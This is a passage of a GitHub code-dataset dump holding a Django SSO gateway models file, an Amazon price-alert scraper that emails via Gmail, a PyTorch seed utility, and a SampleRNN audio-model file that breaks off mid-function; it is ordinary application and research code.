else:\n value = str(instance)\n elif len(field_path) == 2:\n model_attr = getattr(instance, field_path[1])\n\n if model_attr is None:\n value = None\n elif ismethod(model_attr):\n value = model_attr()\n elif isinstance(model_attr, property):\n value = model_attr\n else:\n value = model_attr\n else:\n logging.error('Django SSO: Unhandled exception. Contact developer with information about it.')\n\n if type(value) not in (str, bool, float, int):\n logging.error(\n f\"Django SSO: For additional field '{field_info}' provided unsupported type {type(value)}\"\n )\n value = None\n\n event['fields'][field_name] = value\n else:\n event['fields'][field_name] = None\n\n return event\n\n def deauthenticate(self, user: Union[str, ModelBase]):\n \"\"\"\n Send deauthentication event to subordinate service, if that active\n\n Args:\n user: User model object or user identy - username field value\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event('deauthenticate', {\n 'user_identy': user if type(user) == str else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def delete_user(self, user: Union[ModelBase, str]):\n \"\"\"\n Casts user deletion event\n\n @param user: User identy string or UserModel instance\n \"\"\"\n return self._send_event('delete_user', {\n 'user_identy': user if isinstance(user, str) else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def change_user_identy(self, old, new):\n \"\"\"\n Emit event for changing user identy.\n\n In cases, when you change login|email|etc...\n\n @param old: Old user identy\n @param new: New user identy\n \"\"\"\n return self._send_event('change_user_identy', {\n 'old': old,\n 'new': new\n })\n\n def update_account(self, user) -> bool:\n \"\"\"\n Send account information to subordinated service, if subordinated service is active\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event(\n event_type='update_account',\n data=self.build_update_user_event(user)\n )\n\n def update_fields(self, to_users: Union[QuerySet, set], instance: ModelBase = None) -> bool:\n \"\"\"\n Send event with updated fields of the related model, if subordinated service is active\n \"\"\"\n if not self.enabled or not len(to_users):\n return True\n\n return self._send_event(\n event_type='update_fields',\n data=self.build_update_fields_event(to_users, instance)\n )\n\n @staticmethod\n def cast_event_to_all_services(event_name: str, **kwargs):\n assert len(event_name) and not event_name.startswith('_'), f\"Bad event name 
{event_name}\"\n\n if not hasattr(Service, event_name) or not isfunction(getattr(Service, event_name)):\n raise Exception(f'Django SSO: {Service.__class__.__name__} has no method {event_name}')\n\n for service in Service.objects.filter(enabled=True):\n getattr(service, event_name)(**kwargs)\n\n class Meta:\n verbose_name = _('Subordinated service')\n verbose_name_plural = _('Subordinated services')\n\n\ndef auth_token_generator():\n return get_random_string(AuthenticationRequest.token.field.max_length)\n\n\nclass AuthenticationRequest(models.Model):\n service: Service = models.ForeignKey('Service', on_delete=models.CASCADE, verbose_name=_('Service'))\n created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), default=auth_token_generator, unique=True)\n user_identy = models.CharField(max_length=128, verbose_name=_('User identy'), help_text=_('E-Mail, login, etc.'))\n next_url = models.CharField(max_length=512, verbose_name=_('Next url'), help_text=_('To go after success auth'))\n authenticated = models.BooleanField(default=False, verbose_name=_('Request has been activated'))\n used = models.BooleanField(default=False, verbose_name=_('Are used in external sso service'))\n\n class Meta:\n verbose_name = _('Authentication request')\n verbose_name_plural = _('Authentication requests')\n\n def activate(self, user: User):\n \"\"\"\n 1) Activate authentication request\n 2) Send base information about user to subordinated service\n \"\"\"\n self.user_identy = getattr(user, user_model.USERNAME_FIELD)\n self.authenticated = True\n self.save()\n\n try:\n return self.service.update_account(user)\n except Exception as e:\n raise SSOException(str(e))\n\n def __str__(self):\n return f'{_(\"Authenticate\")} {self.user_identy} {_(\"on\")} {self.service} {_(\"then go to\")} {self.next_url}'\n", "repo_name": "DAVIDhaker/django-sso", "sub_path": "src/django_sso/sso_gateway/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 11025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 19, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models.URLField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 30, "usage_type": 
"call"}, {"api_name": "django.conf.settings", "line_number": 39, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 77, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 99, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO", "line_number": 99, "usage_type": "attribute"}, {"api_name": "django.conf.settings.SSO", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 110, "usage_type": "name"}, {"api_name": "inspect.ismethod", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 128, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 136, "usage_type": "name"}, {"api_name": "django_sso.sso_gateway.Settings", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models.QuerySet", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 150, "usage_type": "call"}, {"api_name": "inspect.ismethod", "line_number": 173, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 194, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 208, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 244, "usage_type": "name"}, {"api_name": "inspect.isfunction", "line_number": 260, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 267, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 268, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 272, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 275, "usage_type": "attribute"}, {"api_name": 
"django.db.models", "line_number": 275, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 276, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 277, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 278, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 279, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 280, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 281, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 282, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 282, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 285, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 286, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 288, "usage_type": "name"}, {"api_name": "django_sso.exceptions.SSOException", "line_number": 300, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 303, "usage_type": "call"}]}
+{"seq_id": "32555115650", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nURL = 'https://www.amazon.in/Apple-MacBook-16-inch-Storage-Intel-Core-i7/dp/B081JXDZFM/ref=sr_1_1_sspa?dchild=1&keywords=macbook&qid=1592241660&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUE3OE9EVDNFUzlMTDImZW5jcnlwdGVkSWQ9QTAyMDEzNTkxSkhVVUdSQ0xFSTJPJmVuY3J5cHRlZEFkSWQ9QTA0ODM5NTQyM0xFRFlBTlM1V09GJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0\"}\n\n\ndef check_price():\n page = requests.get(URL, headers=headers)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n # print(soup.prettify())\n\n productTitle = soup.find(id='productTitle').get_text()\n price = soup.find(id='priceblock_ourprice').get_text()\n temp = ''\n for n in price[2:-3]:\n if n != ',':\n temp += n\n productPrice = int(temp)\n\n if productPrice > 185000:\n send_email()\n\n print(productPrice)\n print(productTitle.strip())\n\n\ndef send_email():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('hraj2661999@gmail.com', 'RaNdOm_PaSsWoRd')\n\n subject = \"Price just fell down!\"\n body =\"Price just fell down!\\nCheck the link\"+URL\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n server.sendmail(\n 'hraj2661999@gmail.com',\n 'hraj2661999@gmail.com',\n msg\n )\n print('HEY! MAIL HAS BEEN SENT')\n\n server.quit()\n\nwhile(True):\n check_price()\n time.sleep(60*60*24)\n", "repo_name": "iamHrithikRaj/Python-App-That-Tracks-Amazon-Prices", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 1561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "74095533289", "text": "import random\nimport numpy as np\nimport torch\n\n# For reproducibility\ndef set_seed(s):\n random.seed(s)\n np.random.seed(s)\n torch.manual_seed(s)\n\n torch.cuda.manual_seed_all(s)\n #add additional seed\n torch.backends.cudnn.deterministic=True\n torch.use_deterministic_algorithms = True", "repo_name": "yaozhong/SCLSC", "sub_path": "code/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.use_deterministic_algorithms", "line_number": 14, "usage_type": "attribute"}]}
+{"seq_id": "27697231307", "text": "import numpy as np\nimport torch\nfrom .configuration import SampleRNNConfiguration\nfrom .utils import SampleRNNQuantizer, lecun_uniform, concat_init\nfrom typing import Dict\n\n\nclass FrameLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Frame level module of the SampleRNN architecture\"\"\"\n\n frame_input_samples: int\n frame_ratio: int\n rnn_layers: int\n rnn_hidden_size: int\n conds_size: int\n\n _samples_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _rnn_layer: torch.nn.GRU\n _rnn_layer_h0: torch.nn.Parameter\n\n _upsampling_layer: torch.nn.ConvTranspose1d\n _upsampling_layer_bias: torch.nn.Parameter\n\n def __init__(self, frame_input_samples: int, frame_ratio: int, rnn_layers: int, rnn_hidden_size: int,\n conds_size: int):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.frame_ratio = frame_ratio\n self.rnn_layers = rnn_layers\n self.rnn_hidden_size = rnn_hidden_size\n self.conds_size = conds_size\n\n # Create self._samples_expand_layer\n self._samples_expand_layer = torch.nn.Conv1d(\n in_channels=frame_input_samples,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._conds_expand_layer\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._rnn_layer\n self._rnn_layer = torch.nn.GRU(\n input_size=rnn_hidden_size,\n hidden_size=rnn_hidden_size,\n num_layers=rnn_layers,\n batch_first=True\n )\n\n # Create self._rnn_layer_h0\n self._rnn_layer_h0 = torch.nn.Parameter(torch.zeros(rnn_layers, rnn_hidden_size))\n\n # Create self._upsampling_layer\n self._upsampling_layer = torch.nn.ConvTranspose1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=frame_ratio,\n stride=frame_ratio,\n bias=False\n )\n\n # Create self._upsampling_layer_bias\n self._upsampling_layer_bias = torch.nn.Parameter(torch.FloatTensor(rnn_hidden_size, frame_ratio))\n\n # Reset Parameters\n self._upsampling_layer.reset_parameters()\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._samples_expand_layer.weight)\n torch.nn.init.constant_(self._samples_expand_layer.bias, 0)\n\n if self.conds_size is not None:\n torch.nn.init.kaiming_uniform_(self._conds_expand_layer.weight)\n torch.nn.init.constant_(self._conds_expand_layer.bias, 0)\n\n torch.nn.init.uniform_(\n self._upsampling_layer.weight,\n -np.sqrt(6 / self.rnn_hidden_size),\n np.sqrt(6 / self.rnn_hidden_size)\n )\n\n torch.nn.init.constant_(self._upsampling_layer_bias, 0)\n\n for i in range(self.rnn_layers):\n concat_init(\n getattr(self._rnn_layer, 'weight_ih_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, lecun_uniform]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_ih_l{}'.format(i)), 0)\n concat_init(\n getattr(self._rnn_layer, 'weight_hh_l{}'.format(i)),\n [lecun_uniform, lecun_uniform, torch.nn.init.orthogonal_]\n )\n torch.nn.init.constant_(getattr(self._rnn_layer, 'bias_hh_l{}'.format(i)), 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._samples_expand_layer = torch.nn.utils.weight_norm(self._samples_expand_layer)\n\n 
if self.conds_size is not None:\n self._conds_expand_layer = torch.nn.utils.weight_norm(self._conds_expand_layer)\n\n self._upsampling_layer = torch.nn.utils.weight_norm(self._upsampling_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning, rnn_hidden_state):\n \"\"\"FrameLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, sequence_length, frame_input_samples) containing the sample\n inputs of the sample level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * (prev) frame_ratio, rnn_hidden_size)\n rnn_hidden_state (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n\n Returns:\n upsampling_output (torch.Tensor): matrix of (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n rnn_hidden_state_new (torch.Tensor): matrix of (rnn_layers, batch_size, rnn_hidden_size)\n \"\"\"\n\n # Obtain the batch size\n (batch_size, sequence_length, _) = input_samples.size()\n\n # Check if we have to upscale the conds\n if sequence_length != input_conds.shape[1]:\n upscale_ratio = int(input_samples.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, sequence_length, input_conds.shape[2])\n\n # samples_expand_output is (batch_size, sequence_length, rnn_hidden_size)\n samples_expand_output = self._samples_expand_layer(input_samples.permute(0, 2, 1)).permute(0, 2, 1)\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1)).permute(0, 2, 1)\n\n # Check if the conds are available\n samples_expand_output += conds_expand_output\n\n # Add conditioning if exists\n if upper_tier_conditioning is not None:\n samples_expand_output += upper_tier_conditioning\n\n # Initialize hidden state tensor\n hidden_state_tensor = torch.zeros(self.rnn_layers, batch_size, self.rnn_hidden_size)\n\n # Move it to CUDA, if available\n if input_samples.is_cuda:\n hidden_state_tensor = hidden_state_tensor.cuda()\n\n # Iterate over hidden state list\n for hidden_state_item_index, hidden_state_item in enumerate(rnn_hidden_state):\n\n # If the item is None, initialize it\n if hidden_state_item is None:\n hidden_state_tensor[:, hidden_state_item_index, :] = self._rnn_layer_h0.unsqueeze(1)\n\n # If the item is not None, assign it\n else:\n hidden_state_tensor[:, hidden_state_item_index, :] = hidden_state_item.unsqueeze(1)\n\n # rnn_output is (batch_size, sequence_length, rnn_hidden_size)\n # rnn_hidden_state_new is (rnn_layers, batch_size, rnn_hidden_size)\n (rnn_output, rnn_hidden_state_new) = self._rnn_layer(samples_expand_output, hidden_state_tensor)\n\n # upsampling_bias is (batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n upsampling_bias = self._upsampling_layer_bias.unsqueeze(0).unsqueeze(2) \\\n .expand(batch_size, self.rnn_hidden_size, sequence_length, self.frame_ratio) \\\n .contiguous().view(batch_size, self.rnn_hidden_size, sequence_length * self.frame_ratio)\n\n # upsampling_output is (batch_size, sequence_length * frame_ratio, rnn_hidden_size)\n upsampling_output = (self._upsampling_layer(rnn_output.permute(0, 2, 1)) + upsampling_bias).permute(0, 2, 1)\n\n # Return the output and the new hidden state\n return upsampling_output, rnn_hidden_state_new\n\n\nclass SampleLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Sample level module of the SampleRNN architecture\"\"\"\n\n # Integer 
containining the number of samples entering the sample level module\n frame_input_samples: int\n conds_size: int\n rnn_hidden_size: int\n q_levels: int\n\n # Embedding layer used to transform from (batch_size, 1059) to (batch_size, 1059, embedding_dim)\n _embedding_layer: torch.nn.Embedding\n\n _embedding_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _inputs_comb_layer: torch.nn.Linear\n\n _global_expand_layer: torch.nn.Conv1d\n _adaptation_layer: torch.nn.Conv1d\n _logsoftmax_layer: torch.nn.LogSoftmax\n\n def __init__(self, frame_input_samples: int, conds_size: int, rnn_hidden_size: int, q_levels: int):\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.conds_size = conds_size\n self.rnn_hidden_size = rnn_hidden_size\n self.q_levels = q_levels\n\n # Create Torch objects\n self._embedding_layer = torch.nn.Embedding(num_embeddings=q_levels, embedding_dim=q_levels)\n\n # lala\n self._embedding_expand_layer = torch.nn.Conv1d(\n in_channels=q_levels,\n out_channels=rnn_hidden_size,\n kernel_size=frame_input_samples, bias=False\n )\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lele\n self._inputs_comb_layer = torch.nn.Linear(\n in_features=self.rnn_hidden_size * 3,\n out_features=self.rnn_hidden_size\n )\n\n # Lolo\n self._global_expand_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Lulu\n self._adaptation_layer = torch.nn.Conv1d(\n in_channels=rnn_hidden_size,\n out_channels=q_levels,\n kernel_size=1\n )\n\n # Lele\n self._softmax_layer = torch.nn.LogSoftmax(dim=2)\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._embedding_expand_layer.weight)\n\n torch.nn.init.kaiming_uniform_(self._global_expand_layer.weight)\n torch.nn.init.constant_(self._global_expand_layer.bias, 0)\n\n lecun_uniform(self._adaptation_layer.weight)\n torch.nn.init.constant_(self._adaptation_layer.bias, 0)\n\n def _normalize_learnable_parameters(self):\n \"\"\"Normalizes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n self._embedding_expand_layer = torch.nn.utils.weight_norm(self._embedding_expand_layer)\n self._global_expand_layer = torch.nn.utils.weight_norm(self._global_expand_layer)\n self._adaptation_layer = torch.nn.utils.weight_norm(self._adaptation_layer)\n\n def forward(self, input_samples, input_conds, upper_tier_conditioning):\n \"\"\"SampleLevelSampleRNNModel forwarding function of the SampleRNN architecture\n\n Args:\n input_samples (torch.Tensor): matrix of (batch_size, 1059) containing the sample inputs of the sample\n level module\n upper_tier_conditioning (torch.Tensor): matrix of (batch_size, sequence_length * frame_size, rnn_hidden_size)\n\n Returns:\n\n \"\"\"\n # Obtain the batch size\n batch_size, _ = input_samples.size()\n\n # Upscale the Conds\n upscale_ratio = int(upper_tier_conditioning.shape[1] / input_conds.shape[1])\n input_conds = input_conds.unsqueeze(2) \\\n .expand(batch_size, input_conds.shape[1], upscale_ratio, input_conds.shape[2]) \\\n .reshape(batch_size, upper_tier_conditioning.shape[1], input_conds.shape[2])\n\n # embedding_output is ()\n 
embedding_output = self._embedding_layer(input_samples.contiguous().view(-1)) \\\n .view(batch_size, -1, self.q_levels)\n\n # Expand both Samples and Conds\n embedding_expand_output = self._embedding_expand_layer(embedding_output.permute(0, 2, 1))\n conds_expand_output = self._conds_expand_layer(input_conds.permute(0, 2, 1))\n\n # Apply Fully-Connected to Samples, Conds and UpperTier\n inputs_comb_output = self._inputs_comb_layer(torch.cat(\n (embedding_expand_output.permute(0, 2, 1), conds_expand_output.permute(0, 2, 1), upper_tier_conditioning),\n dim=2)\n )\n inputs_comb_output = torch.nn.functional.relu(inputs_comb_output)\n\n # global_expand_output is ()\n global_expand_output = self._global_expand_layer(inputs_comb_output.permute(0, 2, 1))\n global_expand_output = torch.nn.functional.relu(global_expand_output)\n\n # adaptation_output is ()\n adaptation_output = self._adaptation_layer(global_expand_output)\n\n # Apply the LogSoftMax layer and return the result as (batch_size, sequence_length * frame_size, ,q_levels)\n return self._softmax_layer(adaptation_output.permute(0, 2, 1))\n\n\nclass SampleRNNModel(torch.nn.Module):\n \"\"\"General module of the SampleRNN architecture\"\"\"\n\n # Lala\n conf: SampleRNNConfiguration\n quantizer: SampleRNNQuantizer\n\n conds_linguistic_phonemes: torch.nn.Embedding\n conds_linguistic_vowels: torch.nn.Embedding\n conds_linguistic_gpos: torch.nn.Embedding\n conds_linguistic_tobi: torch.nn.Embedding\n\n _conds_adaptation_layer: torch.nn.Linear\n\n frame_level_layers: torch.nn.ModuleList\n sample_level_layer: SampleLevelSampleRNNModel\n\n frame_level_hidden_states: Dict\n\n def __init__(self, conf: SampleRNNConfiguration, quantizer: SampleRNNQuantizer, conds_linguistic_n=None):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.conf = conf\n self.quantizer = quantizer\n\n # Initialize parameters for FrameLevelLayers\n self.frame_level_layers = torch.nn.ModuleList()\n self.conds_linguistic_phonemes = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[0],\n embedding_dim=self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n )\n self.conds_linguistic_vowels = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[1],\n embedding_dim=self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n )\n self.conds_linguistic_gpos = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[2],\n embedding_dim=self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n )\n self.conds_linguistic_tobi = torch.nn.Embedding(\n num_embeddings=conds_linguistic_n[3],\n embedding_dim=self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n )\n\n # Create the Conds Adaptation Layer\n self._conds_adaptation_layer = torch.nn.Linear(\n in_features=self.conf.conditionants['utterance_size_expanded'] + self.conf.conditionants['speaker_size'],\n out_features=self.conf.conditionants['global_size']\n )\n\n # Lala\n for layer_n in range(0, len(self.conf.architecture['frame_layers_fs'])):\n self.frame_level_layers.append(\n FrameLevelSampleRNNModel(\n frame_input_samples=self.conf.architecture['frame_layers_fs'][layer_n],\n frame_ratio=self.conf.architecture['frame_layers_ratios'][layer_n],\n rnn_layers=self.conf.architecture['frame_layers_rnn_layers'][layer_n],\n rnn_hidden_size=self.conf.architecture['frame_layers_rnn_hidden_size'][layer_n],\n conds_size=self.conf.conditionants['global_size']\n )\n )\n\n # Initialize SampleLevelRNN\n self.sample_level_layer = SampleLevelSampleRNNModel(\n 
frame_input_samples=conf.architecture['frame_layers_ratios'][0],\n conds_size=self.conf.conditionants['global_size'],\n rnn_hidden_size=conf.architecture['frame_layers_rnn_hidden_size'][0],\n q_levels=conf.quantizer['q_levels']\n )\n\n # Initialize Hidden States\n self.frame_level_hidden_states = None\n\n def _get_frame_level_hidden_states(self, frame_level_layer, reset_list):\n\n # Define returned Tensor\n frame_level_layer_hidden_state = []\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # If the element is False, get stored item\n if reset_element == 0:\n frame_level_layer_hidden_state.append(self.frame_level_hidden_states[frame_level_layer][reset_index])\n\n # If the element is True, set None to that element\n elif reset_element == 1:\n frame_level_layer_hidden_state.append(None)\n\n # Return the list\n return frame_level_layer_hidden_state\n\n def _set_frame_level_hidden_states(self, new_hidden_state_tensor, frame_level_layer: FrameLevelSampleRNNModel,\n reset_list):\n\n # Create aux var\n last_hidden_state = 0\n\n # Iterate over the batch_size elements\n for reset_index, reset_element in enumerate(reset_list):\n\n # Assign only if reset_element == 1 or 0\n if reset_element == 0 or reset_element == 1:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = \\\n new_hidden_state_tensor[:, last_hidden_state, :]\n last_hidden_state += 1\n else:\n self.frame_level_hidden_states[frame_level_layer][reset_index] = None\n\n def _format_linguistic_features(self, input_conds):\n # Create aux conds Tensor\n input_conds_aux = torch.zeros(\n (input_conds.shape[0], input_conds.shape[1], self.conf.conditionants['utterance_size_expanded'])\n )\n\n # Shorcuts for embedding sizes\n phonemes_size = self.conf.conditionants['utterance_linguistic_phonemes_embedding_size']\n vowels_size = self.conf.conditionants['utterance_linguistic_vowels_embedding_size']\n gpos_size = self.conf.conditionants['utterance_linguistic_gpos_embedding_size']\n tobi_size = self.conf.conditionants['utterance_linguistic_tobi_embedding_size']\n\n # Define aux variable\n last_index = 0\n\n # Append CATEGORICAL features at the beginning\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 2].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = self.conds_linguistic_phonemes(\n input_conds[:, :, 3].long())\n last_index += phonemes_size\n\n input_conds_aux[:, :, last_index:last_index + phonemes_size] = 